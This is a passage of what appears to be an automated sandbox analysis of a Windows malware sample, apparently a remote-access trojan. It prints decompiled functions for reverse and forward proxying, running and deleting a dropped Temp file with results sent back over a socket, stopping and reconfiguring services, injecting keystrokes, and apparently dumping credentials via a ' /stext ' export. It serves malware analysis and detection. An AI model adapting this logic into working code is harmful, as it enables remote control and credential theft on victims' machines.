                    												_t195 = E004493AC(_t207, _t244, _t246, _t258, __eflags, _v704, 1, 0x457410, 0x7f,  &_v528,  *_t88, 1);
                    												_t268 = _t268 + 0x1c;
                    												__eflags = _t195;
                    												_t196 = _v704;
                    												if(_t195 == 0) {
                    													_t258[1] = _t196;
                    												} else {
                    													do {
                    														 *(_t262 + _t196 * 2 - 0x20c) =  *(_t262 + _t196 * 2 - 0x20c) & 0x000001ff;
                    														_t196 = _t196 + 1;
                    														__eflags = _t196 - 0x7f;
                    													} while (_t196 < 0x7f);
                    													_t199 = E004337C1( &_v528,  *0x46a170, 0xfe);
                    													_t268 = _t268 + 0xc;
                    													__eflags = _t199;
                    													_t258[1] = 0 | _t199 == 0x00000000;
                    												}
                    												_t103 = _t246 + 8; // 0x8b56ff8b
                    												 *_t258 =  *_t103;
                    											}
                    											 *(_t246 + 0x18) = _t258[1];
                    											goto L38;
                    										}
                    										__eflags = _t244;
                    										if(_t244 != 0) {
                    											 *_t258 =  *(_t258 + _t244 * 8);
                    											_t258[1] =  *(_t258 + 4 + _t244 * 8);
                    											 *(_t258 + _t244 * 8) = _v720;
                    											 *(_t258 + 4 + _t244 * 8) = _v708;
                    										}
                    										goto L27;
                    									}
                    									L38:
                    									_t173 = _t207 * 0xc;
                    									_t110 = _t173 + 0x457350; // 0x40dd8c
                    									 *0x453474(_t246);
                    									_t175 =  *((intOrPtr*)( *_t110))();
                    									_t228 = _v724;
                    									__eflags = _t175;
                    									if(_t175 == 0) {
                    										__eflags = _t228 - 0x46a2a8;
                    										if(_t228 != 0x46a2a8) {
                    											_t257 = _t207 + _t207;
                    											__eflags = _t257;
                    											asm("lock xadd [eax], ecx");
                    											if(_t257 != 0) {
                    												goto L43;
                    											} else {
                    												_t128 = _t257 * 8; // 0x30ff068b
                    												E004401F5( *((intOrPtr*)(_t246 + _t128 + 0x28)));
                    												_t131 = _t257 * 8; // 0x30ff0c46
                    												E004401F5( *((intOrPtr*)(_t246 + _t131 + 0x24)));
                    												_t134 = _t207 * 4; // 0xb94f
                    												E004401F5( *((intOrPtr*)(_t246 + _t134 + 0xa0)));
                    												_t231 = _v704;
                    												 *((intOrPtr*)(_v716 + _t246)) = _t231;
                    												 *(_t246 + 0xa0 + _t207 * 4) = _t231;
                    											}
                    										}
                    										_t229 = _v732;
                    										 *_t229 = 1;
                    										 *((intOrPtr*)(_t246 + 0x28 + (_t207 + _t207) * 8)) = _t229;
                    									} else {
                    										 *(_v716 + _t246) = _t228;
                    										_t115 = _t207 * 4; // 0xb94f
                    										E004401F5( *((intOrPtr*)(_t246 + _t115 + 0xa0)));
                    										 *(_t246 + 0xa0 + _t207 * 4) = _v736;
                    										E004401F5(_v732);
                    										 *(_t246 + 8) = _v740;
                    										goto L1;
                    									}
                    									goto L2;
                    								}
                    							}
                    						} else {
                    							goto L2;
                    						}
                    						goto L47;
                    					}
                    					asm("sbb eax, eax");
                    					_t158 = _t157 | 0x00000001;
                    					__eflags = _t158;
                    					goto L10;
                    				} else {
                    					L1:
                    					L2:
                    					return E0042FD1B(_v8 ^ _t262);
                    				}
                    				L47:
                    			}

                    APIs
                      • Part of subcall function 00441CE2: GetLastError.KERNEL32(?,00000000,0043B8C2,?,004170CE,-0046DD44,?,?,?,?,?,0040AEF2,.vbs), ref: 00441CE6
                      • Part of subcall function 00441CE2: _free.LIBCMT ref: 00441D19
                      • Part of subcall function 00441CE2: SetLastError.KERNEL32(00000000,?,004170CE,-0046DD44,?,?,?,?,?,0040AEF2,.vbs), ref: 00441D5A
                      • Part of subcall function 00441CE2: _abort.LIBCMT ref: 00441D60
                    • _memcmp.LIBVCRUNTIME ref: 0043EC78
                    • _free.LIBCMT ref: 0043ECE9
                    • _free.LIBCMT ref: 0043ED02
                    • _free.LIBCMT ref: 0043ED34
                    • _free.LIBCMT ref: 0043ED3D
                    • _free.LIBCMT ref: 0043ED49
                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: _free$ErrorLast$_abort_memcmp
                    • String ID: C
                    • API String ID: 1679612858-1037565863
                    • Opcode ID: 396cf42111b30fdd357e3ce95326dce3266439ae5a60f4affbd4cac6878eaba6
                    • Instruction ID: 95dbb2c384f2b4054f08a0819f6185acf069c750c5e84a8d12f5530653077751
                    • Opcode Fuzzy Hash: 396cf42111b30fdd357e3ce95326dce3266439ae5a60f4affbd4cac6878eaba6
                    • Instruction Fuzzy Hash: 81B12B7590221ADFDB24DF19C884AAEB7B4FF08314F1055AEE94AA7390D735AE90CF44
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 66%
                    			E0040EEA8(void* __edx, void* __eflags, intOrPtr _a4) {
                    				char _v32;
                    				char _v56;
                    				void* _v60;
                    				char _v72;
                    				char _v76;
                    				char _v80;
                    				char _v88;
                    				char _v92;
                    				void* _v96;
                    				char _v108;
                    				char _v112;
                    				void* __ebx;
                    				void* __edi;
                    				void* __ebp;
                    				intOrPtr* _t24;
                    				void* _t30;
                    				char* _t32;
                    				char* _t35;
                    				intOrPtr _t48;
                    				char* _t49;
                    				char* _t56;
                    				char* _t61;
                    				void* _t64;
                    				intOrPtr _t117;
                    				void* _t121;
                    				void* _t124;
                    				void* _t126;
                    				void* _t127;
                    				void* _t129;
                    				signed int _t131;
                    				void* _t134;
                    				void* _t135;
                    				void* _t136;
                    				void* _t140;
                    
                    				_t142 = __eflags;
                    				_t107 = __edx;
                    				_push(_t64);
                    				_t117 = _a4;
                    				E004020EC(_t64,  &_v76, __edx, __eflags, _t117 + 0x1c);
                    				SetEvent( *(_t117 + 0x34));
                    				_t24 = E00401F95( &_v80);
                    				E004042A6( &_v80,  &_v56, 4, 0xffffffff);
                    				_t134 = (_t131 & 0xfffffff8) - 0x3c;
                    				E004020EC(0x46c238, _t134, _t107, _t142, 0x46c238);
                    				_t135 = _t134 - 0x18;
                    				E004020EC(0x46c238, _t135, _t107, _t142,  &_v72);
                    				_t30 = E00417478( &_v112, _t107);
                    				_t136 = _t135 + 0x30;
                    				_t121 =  *_t24 - 0x46;
                    				if(_t121 == 0) {
                    					E00401E49( &_v88, _t107, __eflags, 1);
                    					_t32 = E00402489();
                    					E00401F95(E00401E49( &_v92, _t107, __eflags, 1));
                    					_t108 = _t32;
                    					_t35 = E0040F69B();
                    					_t123 = _t35;
                    					__eflags = _t35;
                    					if(__eflags == 0) {
                    						_t124 = _t136 - 0x18;
                    						_push("1");
                    						L19:
                    						_t107 = E00402FB7( &_v32, E00401E49( &_v88, _t108, __eflags, 0), 0x46c238);
                    						E00405343(0x46c238, _t124, _t37, _t117, __eflags);
                    						_push(0x85);
                    						E00404AA4(0x46c238, _t117, _t37, __eflags);
                    						E00401FC7();
                    						L20:
                    						E00401E74( &_v108, _t107);
                    						E00401FC7();
                    						E00401FC7();
                    						return 0;
                    					}
                    					 *0x46bd3c = E0040F931(_t123, "StartForward");
                    					 *0x46bd38 = E0040F931(_t123, "StartReverse");
                    					 *0x46bd40 = E0040F931(_t123, "StopForward");
                    					_t48 = E0040F931(_t123, "StopReverse");
                    					_t108 = "GetDirectListeningPort";
                    					 *0x46bd48 = _t48;
                    					_t49 = E0040F931(_t123, "GetDirectListeningPort");
                    					__eflags =  *0x46bd3c;
                    					 *0x46bd44 = _t49;
                    					if(__eflags == 0) {
                    						L17:
                    						_t124 = _t136 - 0x18;
                    						_push("2");
                    						goto L19;
                    					}
                    					__eflags =  *0x46bd38;
                    					if(__eflags == 0) {
                    						goto L17;
                    					}
                    					__eflags =  *0x46bd40;
                    					if(__eflags == 0) {
                    						goto L17;
                    					}
                    					__eflags = _t49;
                    					if(__eflags == 0) {
                    						goto L17;
                    					}
                    					 *0x46bd4c = 1;
                    					E004020EC(0x46c238, _t136 - 0x18, "GetDirectListeningPort", __eflags, E00401E49( &_v88, "GetDirectListeningPort", __eflags, 0));
                    					_push(0x76);
                    					L10:
                    					E00404AA4(0x46c238, _t117, _t108, __eflags);
                    					goto L20;
                    				}
                    				_t126 = _t121 - 1;
                    				if(_t126 == 0) {
                    					_t56 =  *0x46bd3c(E00436769(_t53, E00401F95(E00401E49( &_v88, _t107, __eflags, 0))));
                    					_t140 = _t136 - 0x14;
                    					L9:
                    					_t108 = _t56;
                    					E00417226(0x46c238, _t140, _t56);
                    					_push(0x77);
                    					goto L10;
                    				}
                    				_t127 = _t126 - 1;
                    				if(_t127 == 0) {
                    					__imp__#12( *0x46c78c);
                    					_t61 =  *0x46bd38(_t30, E00436769(_t58, E00401F95(E00401E49( &_v92, _t107, __eflags, 0))) & 0x0000ffff);
                    					__eflags = _t61;
                    					_t105 =  !=  ? 1 :  *0x46bd4d & 0x000000ff;
                    					 *0x46bd4d =  !=  ? 1 :  *0x46bd4d & 0x000000ff;
                    					_t108 = _t61;
                    					E00417226(0x46c238, _t136 - 0x10, _t61);
                    					_push(0x78);
                    					goto L10;
                    				}
                    				_t129 = _t127 - 1;
                    				if(_t129 == 0) {
                    					_t56 =  *0x46bd40();
                    					_t140 = _t136 - 0x18;
                    					goto L9;
                    				}
                    				if(_t129 == 1) {
                    					 *0x46bd48();
                    					 *0x46bd4d = 0;
                    				}
                    				goto L20;
                    			}

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: Eventinet_ntoa
                    • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse
                    • API String ID: 3578746661-168337528
                    • Opcode ID: 03d07ba58d00eb483986e3bfd8ae2d6de7d9a0680fa2b323185ff683fb1ebc7a
                    • Instruction ID: 5be76a892bc31f628a71e06d9e43f1a7a98cf15a787e29941cb9cfc22c663fa8
                    • Opcode Fuzzy Hash: 03d07ba58d00eb483986e3bfd8ae2d6de7d9a0680fa2b323185ff683fb1ebc7a
                    • Instruction Fuzzy Hash: A351D671A043019BC614BB36D85A66E36A59B81308F40493FF941AB6E2EF7C9D49C7CF
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 73%
                    			E00413D1B(void* __eflags, char _a4, char _a28) {
                    				char _v28;
                    				struct _SHELLEXECUTEINFOA _v88;
                    				char _v112;
                    				char _v136;
                    				char _v316;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				void* __ebp;
                    				void* _t33;
                    				void* _t41;
                    				intOrPtr _t50;
                    				signed int _t60;
                    				char* _t68;
                    				void* _t73;
                    				void* _t87;
                    				void* _t90;
                    
                    				_t93 = __eflags;
                    				_t33 = E00402084(_t60,  &_v136, "\\");
                    				_t86 = E004075C2(_t60,  &_v112, E0043988A(_t60, __eflags, "Temp"), _t87, _t93, _t33);
                    				E00402F93(_t60,  &_v28, _t35, _t93,  &_a4);
                    				E00401FC7();
                    				_t68 =  &_v136;
                    				E00401FC7();
                    				_push(_t68);
                    				_push(_t68);
                    				_t41 = E00413F58(E0040D544( &_v316, _t35, _t93, E00401F95( &_v28), 0x10),  &_v316);
                    				_t94 = _t41;
                    				if(_t41 == 0) {
                    					E00402084(_t60, _t90 - 0x18, 0x45f6bc);
                    					_push(0x6f);
                    					_t73 = 0x46c800;
                    					goto L6;
                    				} else {
                    					_t86 =  &_a28;
                    					E00413F68( &_v316,  &_a28, _t94);
                    					E0040D4F5( &_v316,  &_a28, _t94);
                    					_v88.hwnd = _v88.hwnd & 0x00000000;
                    					_v88.lpVerb = _v88.lpVerb & 0x00000000;
                    					_v88.cbSize = 0x3c;
                    					_v88.fMask = 0x40;
                    					_t50 = E00401F95( &_v28);
                    					asm("movaps xmm0, [0x466090]");
                    					_v88.lpFile = _t50;
                    					asm("movups [ebp-0x40], xmm0");
                    					_t60 = _t60 & 0xffffff00 | ShellExecuteExA( &_v88) != 0x00000000;
                    					_t96 = _v88.hProcess;
                    					if(_v88.hProcess != 0) {
                    						E00402084(_t60, _t90, 0x45f6bc);
                    						_push(0x70);
                    						E00404AA4(_t60, 0x46c800,  &_a28, _t96);
                    						WaitForSingleObject(_v88.hProcess, 0xffffffff);
                    						CloseHandle(_v88.hProcess);
                    						DeleteFileA(E00401F95( &_v28));
                    					}
                    					_t97 = _t60 - 1;
                    					if(_t60 == 1) {
                    						E00402084(_t60, _t90 - 0x18, 0x45f6bc);
                    						_push(0x6e);
                    						_t73 = 0x46c800;
                    						L6:
                    						E00404AA4(_t60, _t73, _t86, _t97);
                    					}
                    				}
                    				E0040CC42(_t60,  &_v316, 0x45f6bc);
                    				E00401FC7();
                    				E00401FC7();
                    				return E00401FC7();
                    			}

                    APIs
                      • Part of subcall function 00413F68: __EH_prolog.LIBCMT ref: 00413F6D
                    • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,0045F6BC), ref: 00413E18
                    • CloseHandle.KERNEL32(00000000), ref: 00413E21
                    • DeleteFileA.KERNEL32(00000000), ref: 00413E30
                    • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00413DE4
                      • Part of subcall function 00404AA4: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B18
                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
                    • String ID: <$@$Temp
                    • API String ID: 1704390241-1032778388
                    • Opcode ID: 8235d64f8fb0ed999a86fc3c1c9360a3b11d0c2a0435fb4322cd5866914dfd3f
                    • Instruction ID: d544d44dfc388409d2ca5176df872b457ecab726ff8bac35079d4976b4930393
                    • Opcode Fuzzy Hash: 8235d64f8fb0ed999a86fc3c1c9360a3b11d0c2a0435fb4322cd5866914dfd3f
                    • Instruction Fuzzy Hash: B1417C3190020A9BCB14FB65CD56AFE7774AF10309F40427EF505760E2EF781A8ACB99
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 77%
                    			E004165DD(signed char __ecx, char _a4) {
                    				signed char _v5;
                    				void* _t7;
                    				signed int _t11;
                    				void* _t17;
                    				short* _t21;
                    				signed int _t24;
                    				int _t25;
                    				void* _t28;
                    				void* _t31;
                    
                    				_push(__ecx);
                    				_t21 = 0;
                    				_v5 = __ecx;
                    				_t7 = OpenSCManagerW(0, 0, 2);
                    				_t2 =  &_a4; // 0x415d21
                    				_t24 = _t2;
                    				_t31 = _t7;
                    				_t28 = OpenServiceW(_t31, E00401EEB(_t24), 2);
                    				if(_t28 != 0) {
                    					_t25 = _t24 | 0xffffffff;
                    					_t11 = _v5 & 0x000000ff;
                    					if(_t11 == 0) {
                    						_push(4);
                    						goto L8;
                    					} else {
                    						_t17 = _t11 - 1;
                    						if(_t17 == 0) {
                    							_push(2);
                    							goto L8;
                    						} else {
                    							if(_t17 == 1) {
                    								_push(3);
                    								L8:
                    								_pop(_t25);
                    							}
                    						}
                    					}
                    					_t21 = _t21 & 0xffffff00 | ChangeServiceConfigW(_t28, 0xffffffff, _t25, 0xffffffff, _t21, _t21, _t21, _t21, _t21, _t21, _t21) != 0x00000000;
                    					CloseServiceHandle(_t31);
                    					CloseServiceHandle(_t28);
                    				} else {
                    					CloseServiceHandle(_t31);
                    				}
                    				E00401EF0();
                    				return _t21;
                    			}

                    APIs
                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,00415D21,00000000), ref: 004165ED
                    • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,00415D21,00000000), ref: 00416601
                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,00415D21,00000000), ref: 0041660E
                    • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00415D21,00000000), ref: 00416643
                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,00415D21,00000000), ref: 00416655
                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,00415D21,00000000), ref: 00416658
                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: Service$CloseHandle$Open$ChangeConfigManager
                    • String ID: !]A
                    • API String ID: 493672254-3355486170
                    • Opcode ID: 2da83694551842a269e36bbdcf3309e14e33c364ad340a3786a25d643810b493
                    • Instruction ID: 232e6080decb0fee5e9ead3af30a3f9a58c51749ff75a055db7eec232c54b811
                    • Opcode Fuzzy Hash: 2da83694551842a269e36bbdcf3309e14e33c364ad340a3786a25d643810b493
                    • Instruction Fuzzy Hash: 59016D311443253AD6114F3C9C4EEBF3B6CDB417B2F01032BF925922D2DA68CE4295AD
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E0041650F(char _a4) {
                    				struct _SERVICE_STATUS _v32;
                    				void* _t6;
                    				signed int _t16;
                    				void* _t19;
                    				void* _t20;
                    
                    				_t16 = 0;
                    				_t6 = OpenSCManagerW(0, 0, 0x40);
                    				_t1 =  &_a4; // 0x415f36
                    				_t20 = _t6;
                    				_t19 = OpenServiceW(_t20, E00401EEB(_t1), 0x40);
                    				if(_t19 != 0) {
                    					_t16 = 0 | ControlService(_t19, 2,  &_v32) != 0x00000000;
                    					CloseServiceHandle(_t20);
                    					CloseServiceHandle(_t19);
                    				} else {
                    					CloseServiceHandle(_t20);
                    				}
                    				E00401EF0();
                    				return _t16;
                    			}

                    APIs
                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,00415F36,00000000), ref: 0041651E
                    • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00415F36,00000000), ref: 00416532
                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00415F36,00000000), ref: 0041653F
                    • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,00415F36,00000000), ref: 0041654E
                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00415F36,00000000), ref: 00416560
                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00415F36,00000000), ref: 00416563
                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: Service$CloseHandle$Open$ControlManager
                    • String ID: 6_A
                    • API String ID: 221034970-3814682797
                    • Opcode ID: 2c2b3b8fe19efe00be5a0416e4d3573a756b0db6844cffd145971c513e7c467f
                    • Instruction ID: da1897a772ed1359c9b05f965c8e3084c4a483461664f911434d7ad5a9b28404
                    • Opcode Fuzzy Hash: 2c2b3b8fe19efe00be5a0416e4d3573a756b0db6844cffd145971c513e7c467f
                    • Instruction Fuzzy Hash: 90F0C2715403187BD221AF65EC49DBF3B6CDB45B92F00002AFE0992196DA38CE4596E9
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 69%
                    			E004445EF(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
                    				signed int _v8;
                    				int _v12;
                    				void* _v24;
                    				signed int _t49;
                    				signed int _t54;
                    				int _t58;
                    				signed int _t60;
                    				short* _t62;
                    				signed int _t66;
                    				short* _t70;
                    				int _t71;
                    				int _t78;
                    				short* _t81;
                    				signed int _t87;
                    				signed int _t90;
                    				void* _t95;
                    				void* _t96;
                    				int _t98;
                    				short* _t101;
                    				int _t103;
                    				signed int _t106;
                    				short* _t107;
                    				void* _t110;
                    
                    				_push(__ecx);
                    				_push(__ecx);
                    				_t49 =  *0x46a00c; // 0xee31ea10
                    				_v8 = _t49 ^ _t106;
                    				_push(__esi);
                    				_t103 = _a20;
                    				if(_t103 > 0) {
                    					_t78 = E004401D9(_a16, _t103);
                    					_t110 = _t78 - _t103;
                    					_t4 = _t78 + 1; // 0x1
                    					_t103 = _t4;
                    					if(_t110 >= 0) {
                    						_t103 = _t78;
                    					}
                    				}
                    				_t98 = _a32;
                    				if(_t98 == 0) {
                    					_t98 =  *( *_a4 + 8);
                    					_a32 = _t98;
                    				}
                    				_t54 = MultiByteToWideChar(_t98, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t103, 0, 0);
                    				_v12 = _t54;
                    				if(_t54 == 0) {
                    					L38:
                    					return E0042FD1B(_v8 ^ _t106);
                    				} else {
                    					_t95 = _t54 + _t54;
                    					_t85 = _t95 + 8;
                    					asm("sbb eax, eax");
                    					if((_t95 + 0x00000008 & _t54) == 0) {
                    						_t81 = 0;
                    						__eflags = 0;
                    						L14:
                    						if(_t81 == 0) {
                    							L36:
                    							_t105 = 0;
                    							L37:
                    							E00430BA0(_t81);
                    							goto L38;
                    						}
                    						_t58 = MultiByteToWideChar(_t98, 1, _a16, _t103, _t81, _v12);
                    						_t121 = _t58;
                    						if(_t58 == 0) {
                    							goto L36;
                    						}
                    						_t100 = _v12;
                    						_t60 = E00442680(_t85, _t103, _t121, _a8, _a12, _t81, _v12, 0, 0, 0, 0, 0);
                    						_t105 = _t60;
                    						if(_t105 == 0) {
                    							goto L36;
                    						}
                    						if((_a12 & 0x00000400) == 0) {
                    							_t96 = _t105 + _t105;
                    							_t87 = _t96 + 8;
                    							__eflags = _t96 - _t87;
                    							asm("sbb eax, eax");
                    							__eflags = _t87 & _t60;
                    							if((_t87 & _t60) == 0) {
                    								_t101 = 0;
                    								__eflags = 0;
                    								L30:
                    								__eflags = _t101;
                    								if(__eflags == 0) {
                    									L35:
                    									E00430BA0(_t101);
                    									goto L36;
                    								}
                    								_t62 = E00442680(_t87, _t105, __eflags, _a8, _a12, _t81, _v12, _t101, _t105, 0, 0, 0);
                    								__eflags = _t62;
                    								if(_t62 == 0) {
                    									goto L35;
                    								}
                    								_push(0);
                    								_push(0);
                    								__eflags = _a28;
                    								if(_a28 != 0) {
                    									_push(_a28);
                    									_push(_a24);
                    								} else {
                    									_push(0);
                    									_push(0);
                    								}
                    								_t105 = WideCharToMultiByte(_a32, 0, _t101, _t105, ??, ??, ??, ??);
                    								__eflags = _t105;
                    								if(_t105 != 0) {
                    									E00430BA0(_t101);
                    									goto L37;
                    								} else {
                    									goto L35;
                    								}
                    							}
                    							_t90 = _t96 + 8;
                    							__eflags = _t96 - _t90;
                    							asm("sbb eax, eax");
                    							_t66 = _t60 & _t90;
                    							_t87 = _t96 + 8;
                    							__eflags = _t66 - 0x400;
                    							if(_t66 > 0x400) {
                    								__eflags = _t96 - _t87;
                    								asm("sbb eax, eax");
                    								_t101 = E0043F98C(_t87, _t66 & _t87);
                    								_pop(_t87);
                    								__eflags = _t101;
                    								if(_t101 == 0) {
                    									goto L35;
                    								}
                    								 *_t101 = 0xdddd;
                    								L28:
                    								_t101 =  &(_t101[4]);
                    								goto L30;
                    							}
                    							__eflags = _t96 - _t87;
                    							asm("sbb eax, eax");
                    							E00450810();
                    							_t101 = _t107;
                    							__eflags = _t101;
                    							if(_t101 == 0) {
                    								goto L35;
                    							}
                    							 *_t101 = 0xcccc;
                    							goto L28;
                    						}
                    						_t70 = _a28;
                    						if(_t70 == 0) {
                    							goto L37;
                    						}
                    						_t125 = _t105 - _t70;
                    						if(_t105 > _t70) {
                    							goto L36;
                    						}
                    						_t71 = E00442680(0, _t105, _t125, _a8, _a12, _t81, _t100, _a24, _t70, 0, 0, 0);
                    						_t105 = _t71;
                    						if(_t71 != 0) {
                    							goto L37;
                    						}
                    						goto L36;
                    					}
                    					asm("sbb eax, eax");
                    					_t72 = _t54 & _t95 + 0x00000008;
                    					_t85 = _t95 + 8;
                    					if((_t54 & _t95 + 0x00000008) > 0x400) {
                    						__eflags = _t95 - _t85;
                    						asm("sbb eax, eax");
                    						_t81 = E0043F98C(_t85, _t72 & _t85);
                    						_pop(_t85);
                    						__eflags = _t81;
                    						if(__eflags == 0) {
                    							goto L36;
                    						}
                    						 *_t81 = 0xdddd;
                    						L12:
                    						_t81 =  &(_t81[4]);
                    						goto L14;
                    					}
                    					asm("sbb eax, eax");
                    					E00450810();
                    					_t81 = _t107;
                    					if(_t81 == 0) {
                    						goto L36;
                    					}
                    					 *_t81 = 0xcccc;
                    					goto L12;
                    				}
			}

                    APIs
                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,00428E1A,?,?,?,00444840,00000001,00000001,?), ref: 00444649
                    • __alloca_probe_16.LIBCMT ref: 00444681
                    • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,00428E1A,?,?,?,00444840,00000001,00000001,?), ref: 004446CF
                    • __alloca_probe_16.LIBCMT ref: 00444766
                    • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 004447C9
                    • __freea.LIBCMT ref: 004447D6
                      • Part of subcall function 0043F98C: RtlAllocateHeap.NTDLL(00000000,0043001C,?,?,00431747,?,?,0046C500,?,?,0040B6CB,0043001C,?,?,?,?), ref: 0043F9BE
                    • __freea.LIBCMT ref: 004447DF
                    • __freea.LIBCMT ref: 00444804
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                    • String ID:
                    • API String ID: 3864826663-0
                    • Opcode ID: 1ffa144e0095bbec8931e96d4ce059a1c473e9d7ef835e52d62b9c07a885e281
                    • Instruction ID: 38c3e806ad7a3790cd52a8b2f1174a250ebfd45b4bb0c692cfbb473d4bf5d511
                    • Opcode Fuzzy Hash: 1ffa144e0095bbec8931e96d4ce059a1c473e9d7ef835e52d62b9c07a885e281
                    • Instruction Fuzzy Hash: E951E3B2610216AFFB258F60CC41FAB77A9EB85754F15462BFC04D7240EB3CDC5186A8
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • SendInput.USER32(00000001,00000001,0000001C,00000000,00000000), ref: 004152BC
                    • SendInput.USER32(00000001,00000001,0000001C,00000000,00000000,00000000), ref: 004152DA
                    • SendInput.USER32(00000001,00000001,0000001C,00000000,00000000,00000000), ref: 004152F7
                    • SendInput.USER32(00000001,00000001,0000001C,00000000,00000000,00000000), ref: 00415309
                    • SendInput.USER32(00000001,00000001,0000001C), ref: 00415320
                    • SendInput.USER32(00000001,00000001,0000001C), ref: 0041533D
                    • SendInput.USER32(00000001,00000001,0000001C), ref: 00415359
                    • SendInput.USER32(00000001,?,0000001C,?), ref: 00415376
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: InputSend
                    • String ID:
                    • API String ID: 3431551938-0
                    • Opcode ID: 6ea3bd92fbcbdd2c947ef4f77b83900cac562dc86d2446edd88204e41788982f
                    • Instruction ID: e5dbb7d03718becac2084a9070c23a21e9d5ec01c3d02bef7d0779bca3f6509f
                    • Opcode Fuzzy Hash: 6ea3bd92fbcbdd2c947ef4f77b83900cac562dc86d2446edd88204e41788982f
                    • Instruction Fuzzy Hash: 96311E72D9025CA9FB109BD1CC46FFFBB78AF58B14F04000AE604AB1C2D6F995858BE5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 94%
                    			E00410305(void* __eflags, void* _a4, char _a28, char _a52, char _a76, char _a100) {
                    				char _v5;
                    				char _v6;
                    				char _v7;
                    				char _v12;
                    				char _v36;
                    				char _v60;
                    				char _v84;
                    				char _v108;
                    				char _v132;
                    				char _v156;
                    				char _v180;
                    				char _v204;
                    				char _v228;
                    				char _v252;
                    				char _v276;
                    				char _v300;
                    				char _v324;
                    				char _v348;
                    				char _v372;
                    				char _v396;
                    				char _v420;
                    				char _v444;
                    				char _v468;
                    				short _v988;
                    				void* __ebx;
                    				void* __edi;
                    				void* _t173;
                    				void* _t199;
                    				void* _t225;
                    				void* _t226;
                    				void* _t394;
                    				void* _t399;
                    				void* _t402;
                    				void* _t405;
                    
                    				_t405 = __eflags;
                    				_v12 = 0;
                    				GetModuleFileNameW(0,  &_v988, 0x104);
                    				_v5 = 0;
                    				_v6 = 0;
                    				E004020D5(0,  &_v300);
                    				E004020D5(0,  &_v276);
                    				E004020D5(0,  &_v252);
                    				E0041800F( &_v228, 0x30, E00401F95(E00417093( &_v36)));
                    				E00401FC7();
                    				E0041800F( &_v204, 0x30, E00401F95(E00417093( &_v36)));
                    				E00401FC7();
                    				E0041800F( &_v180, 0x30, E00401F95(E00417093( &_v36)));
                    				E00401FC7();
                    				E00401F95( &_a52);
                    				_t393 = L" /stext \"";
                    				_t224 = E0041432B(E00401EEB(E004030A6(0,  &_v396, E00404429(0,  &_v420, E00404405(0,  &_v444,  &_v988, _t405, E0040427F(0,  &_v468, L" /stext \"")), _t405,  &_v228), L" /stext \"", _t405, "\"")));
                    				E00401EF0();
